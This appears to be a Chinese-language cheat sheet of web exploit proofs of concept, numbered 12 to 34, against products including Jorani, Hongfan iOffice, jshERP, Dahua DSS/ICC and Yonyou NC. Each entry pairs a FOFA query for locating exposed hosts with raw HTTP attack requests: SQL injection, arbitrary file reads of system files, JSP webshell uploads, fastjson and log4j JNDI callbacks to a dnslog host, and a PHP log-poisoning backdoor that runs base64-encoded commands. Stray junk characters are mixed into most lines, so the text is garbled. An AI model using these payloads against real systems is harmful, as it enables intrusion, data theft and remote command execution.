0 G4 ]; N0 x' {5 A9 H9 d, TGET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1* E( k& |2 X# F; ~8 a  ^
Host: 127.0.0.1) E  Q( F) [1 T0 w5 O5 [
Pragma: no-cache
0 B$ a* W- \! c, eCache-Control: no-cache' h9 h; D7 p6 n
Upgrade-Insecure-Requests: 1
: n0 y6 ~% b2 {  ?7 a" LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
, g0 u) a0 q" q3 z+ BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7* d6 b1 q1 m0 u( Y! Z* W
Accept-Encoding: gzip, deflate' M5 [  r2 F3 t* b; ^+ l, i& m
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 r* X8 I4 Z: `% x2 m7 W+ LConnection: close
% s3 Y! @4 ^5 _  y  N9 Q
5 v0 L3 W; O- c+ Q$ I" V' w# I2 h7 d1 d* ?( Y2 U- i. Z8 D
12. Jorani < 1.0.2 远程命令执行- W- O6 V  v& e3 j/ X
FOFA:title="Jorani": V) \  a8 m# X
第一步先拿到cookie
, U, t) n: J6 _  |( ?GET /session/login HTTP/1.1- Z7 @; O( ?" T
Host: 192.168.190.30
( T7 n; e3 E1 [& P% H$ sUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, ~" Y3 o) w1 B  DConnection: close
" t2 C! U1 r( r  s- }: cAccept-Encoding: gzip7 I% w$ B/ f/ p- v. i, \2 L5 x0 r
  h( z( r" }6 {1 s. k( o

. }" x1 W& g' p6 g! K响应中csrf_cookie_jorani用于后续请求' S4 {& `: p. \$ J
HTTP/1.1 200 OK
+ i8 j  O+ b  x5 w4 S7 ^Connection: close
% ?& u9 T' x/ R2 i' sCache-Control: no-store, no-cache, must-revalidate
3 U- H' T" _# A7 R7 Y, EContent-Type: text/html; charset=UTF-8
8 t( Z% r/ F2 [1 jDate: Tue, 24 Oct 2023 09:34:28 GMT
, z' D9 {1 M7 o0 Q2 [Expires: Thu, 19 Nov 1981 08:52:00 GMT. D  B: ^, t4 O- i5 x8 O5 Q* ?: C
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT6 {% p8 n4 N( z! N: U* x- m
Pragma: no-cache
0 T2 k. c; Q* f2 m* sServer: Apache/2.4.54 (Debian)9 r# r; [& ^! i, \4 ?
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/: v+ Z0 H9 q. \2 Q) P; ~" f4 J6 k. ]) f; m
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly8 b7 J7 j! r2 Q/ d1 O# x
Vary: Accept-Encoding3 H0 n+ X6 e$ o% p, }  \

$ A" `# v: Z1 ?2 V" F& Q; Z& l
' u2 I. _& h5 b" v$ zPOST请求,执行函数并进行base64编码
% n2 M8 i  C8 N) f- lPOST /session/login HTTP/1.1: H8 m" a5 ~) r
Host: 192.168.190.30
& y3 ~* o( J" Y5 D; QUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
% d, g2 {2 K* R* w. vConnection: close; ]& {) `- E, O9 w/ m
Content-Length: 252# H0 v( c. \- m) b2 j
Content-Type: application/x-www-form-urlencoded# n; V  D; v+ b
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
9 r% z* F) p! {! ~: ^- [9 B- QAccept-Encoding: gzip
9 Z1 q% K9 l* l, t% z
4 J5 }+ j+ b& [$ G' B6 wcsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor" v2 d! Q; S4 h3 O
2 s* g/ x1 Y/ \- N: Y# |2 x! s

; o7 R9 ~' ?$ b+ G1 y
+ K+ B# M; V$ F+ {$ M% y向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串: t/ O" L! j/ U; D# E+ s8 R
GET /pages/view/log-2023-10-24 HTTP/1.1. N& w6 b. f6 {9 z
Host: 192.168.190.30
7 |1 l! q  D  V) h1 [4 AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.365 M- r$ O/ }, ]) }  {/ p7 }
Connection: close
' L  Y/ i! @8 x1 U+ L8 GCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
; Z& ^+ J' e) Z3 e' ?K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=6 C+ I4 e: d9 L0 R2 |' R
X-REQUESTED-WITH: XMLHttpRequest
: i# }3 ~% R) t2 t* r! V& \8 xAccept-Encoding: gzip
7 ?* C+ j- R5 u2 ~  C5 T: ^
7 O# N+ f: a1 T6 ]/ E) x' M8 z$ j( b/ T# r9 `) l6 M6 q6 E
13. 红帆iOffice ioFileDown任意文件读取: f% L- W" W" T
FOFA:app="红帆-ioffice"# k4 h9 }8 Y0 J  Q; T! [! E
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
4 {( z: \2 R2 WHost: x.x.x.x: k8 F: w" \) c3 I- O/ g3 m
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
6 X7 u' L" v/ ~( D* _( u8 D6 QConnection: close
& l- R' O1 Z7 V6 H& M, d: _Accept: */*1 i& b6 c0 |4 S. Q) M7 E- J1 W
Accept-Encoding: gzip
1 Z. @8 E  X& b) i5 ]1 b" J5 C4 L1 \, C" c% Q0 ^* ^) f

0 n$ c' V$ A8 q14. 华夏ERP(jshERP)敏感信息泄露) |" W% B8 A6 t* x
FOFA:body="jshERP-boot"' p/ e+ E9 q8 Y: p( ^' ]- f9 q! A
泄露内容包括用户名密码
+ H* q: m  v& r% j( ]  a$ }) NGET /jshERP-boot/user/getAllList;.ico HTTP/1.1
5 _2 q4 R7 q  [4 p9 ^+ K6 kHost: x.x.x.x
6 x6 f5 h; E! W0 w3 zUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36' K! u' o/ w3 `8 j9 y3 z. s
Connection: close& M: Q+ S8 w1 i. Y7 p
Accept: */*
- Z7 K% M) ^4 Q! cAccept-Language: en5 w8 c& ]3 u! u' k) `5 E9 v1 \
Accept-Encoding: gzip( b- p+ u, \. r1 V# R2 g' ~

. b& |! K) F7 ]" M; k2 J6 P4 I! B0 ]: L" @
15. 华夏ERP getAllList信息泄露7 ?* Z: D& Z+ O  e; ]% t
CVE-2024-04906 \7 [1 k$ B, E& I$ q6 T3 e" L: T
FOFA:body="jshERP-boot"' `9 H% {+ d) v
泄露内容包括用户名密码
# L! i# y3 M; a% I1 QGET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
: z/ u) D0 _0 k, G6 DHost: 192.168.40.130:100. x( B5 o9 P# Z# b5 m. K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
8 _- \$ X/ @& M& i5 ~Connection: close
4 x/ Q, v; C& nAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.88 K' M5 x* L7 k5 V8 [( v, [# y
Accept-Language: en
, r/ G4 \& o, Vsec-ch-ua-platform: Windows
$ V. O3 }) ?; JAccept-Encoding: gzip$ n# _! g3 R3 I8 p2 K

$ w4 ~: |! |# R/ p* q& |* z
6 p0 }. _0 s: u: k9 e0 y+ q16.  红帆HFOffice医微云SQL注入5 L) H7 \8 n7 D# H
FOFA:title="HFOffice"
5 ?4 F4 @, p6 X; fpoc中调用函数计算1234的md5值
5 v) N: [3 O/ L! U* ?GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
/ A0 f. H0 e: _8 ]' jHost: x.x.x.x) P7 I7 Z! [( y  I6 T
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
0 H9 g1 \8 I2 U) o- CConnection: close2 \* c. l7 b& U
Accept: */*
% p" {! e* {$ w8 M6 LAccept-Language: en
. Q' d$ u8 |4 C, \7 X8 V: z( {Accept-Encoding: gzip  p) o3 ^0 A3 U" S# ^, _+ H

  J9 ?& p& f7 i% f& a$ K# Z, m  t' |
17. 大华 DSS itcBulletin SQL 注入2 o$ L% b! |) C# [9 f
FOFA:app="dahua-DSS"" t& S8 a5 Z' u. u
POST /portal/services/itcBulletin?wsdl HTTP/1.1
* {1 P, l! [  DHost: x.x.x.x
: D; u7 o, P" ]( jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
( u9 ^" u& a8 U: i0 R# tConnection: close/ M3 Y! z! e" h$ g/ X' k8 w: Z
Content-Length: 345
8 o  J0 B7 p2 J4 C0 M* G( qAccept-Encoding: gzip4 y9 ~" k' a# M/ t9 S
4 a; n9 t8 Z# p! q' z" g
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
- b6 o% C# N9 T. I<s11:Body>
9 ~3 ?0 A9 n4 M$ s    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>0 R1 b2 B0 k6 l7 I4 e3 i& a' P, [
      <netMarkings>
* Y( [. V* p% t* c# I1 t2 ?. u       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
, @9 N" P' |7 K$ d% n: O& z      </netMarkings>7 ^0 U! s4 h9 o" T
    </ns1:deleteBulletin>
2 I& \  ^1 \1 k. @  </s11:Body># G3 B+ `5 B& R- M% Y8 W
</s11:Envelope>
* z& |0 m' {" E) n+ i& `  k
! N0 l! Z3 A' f% ~9 b* v* z2 _
, u& r( o% `5 l6 y18. 大华 DSS 数字监控系统 user_edit.action 信息泄露, ?- z5 }/ {3 F  A5 @# P3 M  {
FOFA:app="dahua-DSS"
* W9 J" e( j5 i8 WGET /admin/cascade_/user_edit.action?id=1 HTTP/1.1% X* q  J! n/ ?' L# f3 Q2 X
Host: your-ip
7 U9 [& m6 g7 mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36" |$ s  g8 s) K2 `2 H, x
Accept-Encoding: gzip, deflate# Q, E  N. e3 u9 [
Accept: */*
! U- G5 P  w- U# }4 nConnection: keep-alive3 H( N# X/ t! U( P9 [) |" N6 m' u

& }" l5 M# N+ K# S0 k7 p- D! b" o! p# F+ O4 @7 ?4 B( q9 V/ Q
% @. h1 c6 ~. O" z0 z  {
19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入/ X6 I! |2 W4 a3 s' }  {$ h1 ?$ x/ Y8 {
FOFA:app="dahua-DSS"$ T' s/ T9 A9 f) q; G1 u
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.10 ]0 I; o9 ^$ E: D  r; l2 ]% j2 _
Host:& `. h6 {9 @, c% S
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
  l% Q: C6 ~! r0 g6 r2 DAccept-Encoding: gzip, deflate# V# ?0 @7 h  P5 V- V9 w
Accept: */*# A% V- ~- W; [( g  [
Connection: keep-alive) Z+ R1 L+ ]/ ?0 n2 u4 D4 `) Q. v

& j6 `5 t% k- r# W- g/ o+ S
0 q0 e" M5 [. ~$ M& x+ U9 x# ?" l9 F20. 大华ICC智能物联综合管理平台任意文件读取  p) H8 e: }$ H2 ^  i! O1 w) I
FOFA:body="*客户端会小于800*"$ A  k( i! ~& ~' [9 p  F6 T
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
3 P( q7 P$ n7 x, f1 p2 o, vHost: x.x.x.x8 P; Y) q* r1 \
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36% k( D, P, M0 x. c8 v
Connection: close4 D: ~& M% {9 A4 Y' {6 h2 k
Accept: */*( _+ Y% B" W* N! Y
Accept-Language: en0 ~0 G3 I, a( f, a- N
Accept-Encoding: gzip5 Q' C# ~" T' f

" W# n' z0 y, z0 V8 l& {
. H6 W$ h* x6 q. A7 Y% [5 e5 x$ a21. 大华ICC智能物联综合管理平台random远程代码执行- ~) y8 b# f( y* k4 b
FOFA:icon_hash="-1935899595"
# k/ h+ q+ N; E( t. zPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1  ]- P; b3 r- j" n+ Z  w: ]0 z* ?2 X
Host: x.x.x.x4 m- W) n5 `6 o/ x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
2 |3 _2 K6 h# y3 YContent-Length: 161
+ P( m8 O2 Q$ H$ J" qAccept-Encoding: gzip8 }. a6 D3 c7 |9 J+ C& i
Connection: close: D! s( _: l! g, |
Content-Type: application/json;charset=utf-8( _  A: \1 {' W4 ]( t  h! C

- ?/ j1 R! z: o8 D{5 H. u" a) |# N  F- F, o+ Z
"a":{
6 N, i, y3 [6 L8 {" ^2 ^   "@type":"com.alibaba.fastjson.JSONObject",3 [4 u7 r2 o# x% L2 j
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}% l  ^7 N8 i( h
  }""
1 _: ?1 I# f5 t2 @+ G5 s  ?* g2 B}
) ?  ]/ f, i0 s' F# f; J1 c
2 w3 B5 ]8 b0 H$ Q% Z/ [/ {; x, ]( {7 H" E4 d
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
! g$ ^$ _) L6 k3 d4 l7 {& v7 m0 HFOFA:icon_hash="-1935899595". \- I+ w; E/ ~0 Z
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
$ E( [# V/ D6 r  c. @) w) r. _% n/ BHost: your-ip, m0 R/ A( h8 }5 C# ~% \. e7 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
5 ]- G0 A# V5 _8 \: N/ l$ jContent-Type: application/json;charset=utf-8
4 O- r& O3 M" C. ^9 u, D' ~, Y5 i* f6 E
{, I7 q9 }$ X# }
"loginName":"${jndi:ldap://dnslog}"
5 i2 w" m* W# p* z* H}' y& |! Q9 f, ~: ]9 z: W# v

/ {8 G# N2 |1 A
; k  {( `+ @" a" \# F; i$ k- k- Z2 V, a' e0 S" w$ Z
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行% s  d8 Q6 l, D5 ~* }
FOFA:icon_hash="-1935899595"
7 \3 w, j6 ^( \  ]POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1  n0 P  r% T7 N/ g4 Q' W
Host: your-ip  R" s% w/ z) S" o! S) U, c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
: E5 z4 N$ |' q8 ~6 bContent-Type: application/json;charset=utf-8# n9 ?5 ^! r# _/ U
Accept-Encoding: gzip
/ p$ m/ W. c5 U- u; DConnection: close
+ I/ e" i3 r, f' q# |
: Z( P5 S; J9 s6 V) l# }( Q0 S{
% V) }+ `% Y/ `    "a":{: T; B$ l. `9 K2 K! k8 H
        "@type":"com.alibaba.fastjson.JSONObject",% P- e3 E' x6 w/ k1 u. P
       {"@type":"java.net.URL","val":"http://DNSLOG"}- f* X9 R* D$ b1 e( R$ z, }/ s
        }""3 P, r0 E: N; m5 s
}
& ^* g, M+ f/ m3 j' Y
4 h$ |- V' o% j' X5 i9 Z7 R& Z: r2 }" C& m& a) v( k
24. 用友NC 6.5 accept.jsp任意文件上传
6 r6 z1 `" H: f! R, rFOFA:icon_hash="1085941792"
8 K, P, J* d, Z! h  z' {POST /aim/equipmap/accept.jsp HTTP/1.1
. e9 A# q* d+ S! {8 d8 [+ THost: x.x.x.x
) Z% Z: I: ^, W4 X4 V; XUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36. r# [" Y2 ~0 X( n+ `* L! r  A* h
Connection: close0 G8 Z* j8 i4 M
Content-Length: 449
0 L9 Y8 j! @- h2 S2 @Accept: */*
$ S# d1 a% @0 k* o: t) nAccept-Encoding: gzip
* b/ v* m7 t3 d( q8 z- WContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc- w# A, q2 l, _5 ~6 L+ C  h

4 r( x1 `. H7 ]0 l. }  \-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
8 u: @7 A# p5 R" E4 tContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
8 h* n5 S7 Q7 ^+ m. v6 i* h! nContent-Type: text/plain8 X. i* N9 U3 S% w$ ]2 ]
* }# P2 ~0 B* I& c; R4 R- V
<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>2 }" o% _3 R3 _1 t/ \
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: c& c4 q3 }) b! QContent-Disposition: form-data; name="fname"
+ Z7 x. M8 z7 E# J' T
8 m9 q* d. O; H0 Q\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
4 L" y5 M7 _  q$ c-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
, ^2 p* i! P- z8 S5 y$ q+ ]2 Z' h4 |; i$ k7 x

: D  i( Y% h5 e( e9 |* `) ?; g0 k25. 用友NC registerServlet JNDI 远程代码执行
9 h% F3 L6 O( ~; n. S( x* u( eFOFA:app="用友-UFIDA-NC"! e1 E; I5 Z1 n
POST /portal/registerServlet HTTP/1.1
: ?( W% s& b- I0 H  v4 MHost: your-ip4 z0 e  y4 y+ Y8 l) ~
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
$ a9 H  w7 [& L% I. PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
7 z2 a: M6 _( p) a0 T3 g4 u# ZAccept-Encoding: gzip, deflate6 p' c* ]& f: R* Z. I
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.65 l+ m; q# M: p  D
Content-Type: application/x-www-form-urlencoded
! `5 ^* _  ~( m2 ]' c
' R9 M6 v7 y5 l! R& J) T- Z7 Xtype=1&dsname=ldap://dnslog! g: \, [9 H, L! I3 \( P/ }

, v1 b1 |; {5 P8 y8 Z
  s% T, {" }% F& y* G2 R- L( ]1 ?# O5 y3 i, t2 F* M7 i6 i) v, A
26. 用友NC linkVoucher SQL注入6 z7 Y: D# l: F  ~2 W
FOFA:app="用友-UFIDA-NC"6 I5 @) ~) G( `1 k, b4 ^
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1/ a9 T  \' o& V
Host: your-ip6 ^# F; M' [8 u# U; ~8 u4 t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 m1 A2 D) A" s
Content-Type: application/x-www-form-urlencoded: O$ e1 u  \' F% x% L9 R# F, w
Accept-Encoding: gzip, deflate1 X2 N2 U; D- T) v* {
Accept: */*, }8 X  g" n* [( `3 S
Connection: keep-alive
+ f. ?2 r0 A# p0 D$ ~$ D3 g0 |; x$ M& V+ ?- \

# ?5 w" j) Y$ J8 `7 V8 M27. 用友 NC showcontent SQL注入2 I# z. [1 c' W
FOFA:icon_hash="1085941792"8 y) V+ l  V  e$ k
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
, h/ B1 S7 a& s% s4 |: z$ UHost: your-ip
# P/ f7 I  x: l3 g) qUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 N! L; H2 B! }* g$ Q; Z
Accept-Encoding: identity
: u% v& Q) Q& q1 P! o; i* |Connection: close
) k! l0 X2 U# z9 _" q4 jContent-Type: text/xml; charset=utf-8
7 W$ B7 E# a# x0 u" o! V6 t
% |- a  _1 S' K' d6 \# N$ H/ h4 ^4 S6 P# Q" |
28. 用友NC grouptemplet 任意文件上传: b9 F; ?' @& s+ V
FOFA:icon_hash="1085941792"" y+ n4 N6 p5 E, o& I  M9 L
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.12 Z0 E; ]' ^) C# _. z% A
Host: x.x.x.x, P5 O, H  N* @  u+ Q' x' S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36/ F  ~, i1 a% B9 R& }
Connection: close
) |2 Z3 H0 S/ ?9 E- ^0 m) {6 QContent-Length: 2689 }/ y4 X# x* Z! J2 o" p
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
* R3 A- |+ S: u' |( CAccept-Encoding: gzip$ K$ c! P+ A5 p2 S8 B

5 j' u$ c/ k2 q& n1 e; W$ T2 c# d------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk# u0 ]2 ^" v7 B; l$ X
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
$ u2 d$ U+ r' c4 d* y% L7 SContent-Type: application/octet-stream
5 x7 U9 v1 y6 ^, V1 j/ a
  G! n$ m* n! S<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
/ Q5 f3 M1 d1 s  @4 U1 g# F7 O------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--% U! n2 K8 w, {9 h8 |/ t
  c+ f: X) t1 i1 c/ n

! Q; }2 H9 Z; f1 o3 D0 Q% Z/uapim/static/pages/nc/head.jsp) u0 n0 i4 a+ p) Z
% `9 `0 e9 G# A- M7 ~6 r8 j
29. 用友NC down/bill SQL注入8 H3 f0 w; N5 F. f% a
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"5 x$ }: X( G- Z) D8 I( z
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1+ O6 N, m  s0 _7 J$ B
Host: your-ip  C( k  S* b7 J2 B3 ]4 u2 ?4 P1 l
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.366 k( {% O: n8 u& z& I. M
Content-Type: application/x-www-form-urlencoded
# V, Y4 y, ^% rAccept-Encoding: gzip, deflate% f# n7 G3 o" S& q
Accept: */*( m! G' n9 s5 ]. k4 `# h4 ~6 I
Connection: keep-alive  L' b( Z5 K" R! @% q( Y
; V- E: h+ Y& \: ?& P

8 b$ w- P4 M1 K% U- X30. 用友NC importPml SQL注入8 \# n( |+ s. ]- ]' P, M
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
6 p- p8 \5 S4 o" BPOST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.13 @% j/ J/ P0 N
Host: your-ip2 h6 U4 R( t. C6 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
& ~9 d$ [$ J1 @+ }2 R! r; g8 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.361 F+ u, v  h( C2 _- C: i- L' z4 \
Connection: close& Z7 f' ]9 i5 {5 A, e' P% U

/ o$ p" D$ {# j+ p------WebKitFormBoundaryH970hbttBhoCyj9V1 z6 e: ]" `' Y, e
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"9 L% P. H8 b3 M8 `$ h$ x
Content-Type: image/jpeg
; v3 y& Y# ]8 q* ^. ^/ z------WebKitFormBoundaryH970hbttBhoCyj9V--, ~) g# e( Y. \/ p+ o- s
( D, c; t" V# y& E1 g& b6 p
9 Y3 O; [5 S+ r8 b9 Q7 k" q! j
31. 用友NC runStateServlet SQL注入
- P8 {' h+ X+ z# B2 C1 c/ i. s+ nversion<=6.5
# e, f, Z8 m  J7 B1 ^0 |FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"+ G* i- B, i( v1 b" o, k! q
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.12 v3 A# {/ @3 a( M9 g+ E: p0 Z5 B; x
Host: host
2 {+ Z* O! W* y! rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36$ @! Y: Q# o# a. x; L
Content-Type: application/x-www-form-urlencoded* m3 d5 ?1 D' D: L3 }

! Z1 V- ^9 D& p/ l. _, k% I- c: F# J$ E: M" K
32. 用友NC complainbilldetail SQL注入  U! C( d: ^4 X3 u2 I
version= NC633、NC65: k5 n% |: L5 a7 P' K7 i1 ~& j. `
FOFA:app="用友-UFIDA-NC"/ J! L$ B2 e; O- |0 Q. I* e# M
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1$ A! A8 j8 g  H" \6 v, k
Host: your-ip
3 U# F! k$ T7 H' wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& ?0 ^. \! B$ a4 `* G7 y! J; z
Content-Type: application/x-www-form-urlencoded  X8 \  k) R+ j" w  a/ c9 H0 g/ J
Accept-Encoding: gzip, deflate+ f- }" a% y6 r, k9 l8 ?9 z5 c% r
Accept: */*- x8 ^  f8 G  r, S/ g  G+ m
Connection: keep-alive
7 f8 i; [) F# ~2 i6 ^  v# h' `7 D2 }/ f, S& ]% T
* ?+ v: k; f$ N
33. 用友NC downTax/download SQL注入
: u% Y# T* }' O  o' S- ]+ |version:NC6.5FOFA:app="用友-UFIDA-NC"
0 C! A5 w8 |$ {, T$ F$ v" EGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1" c+ g* v* E; H9 b0 V( f, x$ u
Host: your-ip0 \, p' C+ N5 ]( t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36& ?( H1 o( O6 Z1 S0 M; S8 t+ l
Content-Type: application/x-www-form-urlencoded3 a! H; Q* {9 F! `/ p5 S
Accept-Encoding: gzip, deflate4 Z* l: |+ S7 a0 i" A. T2 U
Accept: */*
% [  h8 W2 y9 R3 T2 o8 I% _0 ~( SConnection: keep-alive9 a4 \  M2 Q, Z; a

- x# g" v( X8 X$ E6 U$ S! G2 L( V: z( N
34. 用友NC warningDetailInfo接口SQL注入
) R2 G1 p% ^' k/ B, ~+ q: Q. tFOFA:app="用友-UFIDA-NC"2 D8 {6 i- h  U3 G4 f( f* ^
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1- x# w1 w5 Q2 h0 E) r; N1 @" }
Host: your-ip
( z& H" S& P8 ?" ~  W* Q0 SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36. T% Z; l6 h6 `# Q4 N' l; l
Content-Type: application/x-www-form-urlencoded3 Q) n7 p) s% {1 ]' r5 W
